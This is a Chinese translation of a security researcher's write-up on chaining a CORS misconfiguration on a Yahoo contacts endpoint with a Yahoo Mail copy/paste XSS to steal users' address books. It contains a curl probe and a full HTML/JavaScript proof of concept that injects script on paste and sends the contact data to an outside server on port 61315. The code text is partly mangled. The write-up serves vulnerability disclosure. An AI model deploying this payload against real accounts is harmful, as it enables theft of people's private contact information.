因為兩個漏洞，雅虎所有用戶通訊錄暴露

背景介紹

文中介紹了研究人員如何利用兩個漏洞（XSS和CORS誤配置漏洞）來竊取受害者通訊錄中的聯繫人信息。竊取的信息包括姓名、電話號碼、地址等。

跨域資源共享CORS(Cross-origin resource sharing)

跨域資源共享CORS(Cross-origin resource sharing)是一種用HTTP頭來使用戶代理從伺服器上獲取特定資源的許可權，而這種請求許可權是跨域的。而瀏覽器強制執行的是同源策略（Same-Origin Policy），同源策略意味著網站上的數據只允許相同域名和埠訪問。這裡有一個例外就是CORS配置，進行CORS配置後，就可以跨域訪問了，數據可以在不同站點之間訪問。

跨站腳本攻擊XSS(Cross Site Scripting)

XSS一種客戶端代碼注入攻擊方式，允許攻擊者在有漏洞的應用中注入腳本。

利用的漏洞詳情

Bug #1:

CORS誤配置http://proddata.xobni.yahoo.com

研究人員用Burp Suite對*.http://yahoo.com子域名的不同請求進行了分析，發現一個很有趣的子域名http://proddata.xobni.yahoo.com，記錄的請求很少，但是都是請求的endpoint都相同——https://proddata.xobni.yahoo.com/v4/contacts。該endpoint含有聯繫人目錄中的每一個聯繫人，而且帶有Access-Control-Allow-Credentials: true的源https://mail.yahoo.com被反射回Access-Control-Allow-Origin。研究人員嘗試修改origin為不同的payload但是並沒有效果，因此研究人員用一個雅虎的子域名替換了該payload。

curl https://proddata.xobni.yahoo.com/v4/contacts -s -H Origin: https://hackerone-cdl.yahoo.com –head

響應消息:

Access-Control-Allow-Origin: https://hackerone-cdl.yahoo.com

Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS

Access-Control-Allow-Credentials: true

從上面的信息可以發現，可以接受所有*.http://yahoo.com子域名的數據並反射到ACAO中，這意味著如果可以在*.http://yahoo.com中發現XSS漏洞，就可以竊取用戶通訊錄信息。

Bug #2: Yahoo郵箱XSS漏洞

研究人員沒有找到雅虎郵箱的XSS漏洞，但是在tweet上發現Enguerran Gillier (@opnsec)發現的雅虎郵箱中的複製粘貼XSS漏洞。

Poc

登錄的用戶可以從頁面中複製任意信息並粘貼到雅虎郵箱中。

<!doctype html>n <head>n <title>Yahoo CORS Misconfiguration</title>n </head>n <body>n <h1>Yahoo CORS Misconfiguration</h1>n <p>Stealing Contact information via CORS Misconfiguration + Yahoo Mail XSS via Copy/Paste</p>n <h3>Prerequisites :</h3>n - Tested on Windows 10 with Firefox 56, Chrome 62, Edge<br/>n <h3>Instructions :</h3>n 1. Select any text in this page and copy it using ctrl-C or right click -> copy <br/>n <span>Copy status : </span><span id="copied">not copied yet</span> <br/>n 2. Go to Yahoo Mail, compose a new email and paste inside the email body<br/>n 3. All of your contacts information will be sent to my server on port 61315 n <script>n document.addEventListener(copy, function(e){n e.clipboardData.setData(text/plain, );n e.clipboardData.setData(text/html,<div id="enhancr2_a">xxx</div><img src="x" onerror="document.write(<script>var xhttp=new XMLHttpRequest();xhttp.onreadystatechange = function() {if (this.readyState == 4 && this.status == 200) {document.location="http://example.com:61315"+escape(this.responseText);}};xhttp.open("GET","https://proddata.xobni.yahoo.com/v4/contacts",true);xhttp.withCredentials = true;xhttp.send();</script>);">);n e.preventDefault();n document.getElementById("copied").textContent = "SUCCESSFULLY COPIED"n });n </script>n

本文翻譯自：http://www.sxcurity.pro/2018/01/11/chaining-yahoo-bugs/ ，如若轉載，請註明原文地址：http://www.4hou.com/info/news/9906.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：